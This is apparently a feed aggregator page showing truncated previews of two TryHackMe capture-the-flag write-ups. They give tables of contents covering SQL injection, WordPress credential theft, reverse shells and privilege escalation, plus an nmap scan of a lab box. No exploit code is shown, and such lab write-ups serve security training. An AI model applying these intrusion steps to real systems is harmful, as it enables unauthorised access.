    CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;) Hey Everyone! This Box is just a little CTF I’ve prepared recently. I hope you enjoy it as it is my first time ever creating something like this ! This CTF is focused primarily on enumeration, better understanding of services and thinking out of the box for some parts of this machine. Feel free to ask any questions…It’s okay to be confused in some parts of the box ;) Just a quick note, Please use the domain wekor.thm as it could be useful later on in the box ;) Contents 1 User flag 1.1 Nmap scan 1.2 Robots.txt 1.3 SQL Injection 1.4 Wordpress credentials 1.5 Wordpress 1.6 Reverse Shell 1.7 Lateral move (www-data -> Orka) 1.8 User flag 2 Root flag 2.1 O…

  • Open

    TryHackMe > Bookstore
    A Beginner level box with basic web enumeration and REST API Fuzzing. Contents 1 User flag 1.1 Port 80 1.2 Port 5000 1.3 Fuzzing the API (v1) 1.4 User flag 2 Root flag 2.1 Console 2.2 Reverse Engineering (try-harder) 2.3 Root shell User flag Nmap discovers 3 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 44:0e:60:ab:1e:86:5b:44:28:51:db:3f:9b:12:21:77 (RSA) | 256 59:2f:70:76:9f:65:ab:dc:0c:7d:c1:a2:a3:4d:e6:40 (ECDSA) |_ 256 10:9f:0b:dd:d6:4d:c7:7a:3d:ff:52:42:1d:29:6e:ba (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Book Store 5000/tcp open http Wer…
2023-02-19T01:42:04.305Z osmosfeed 1.15.1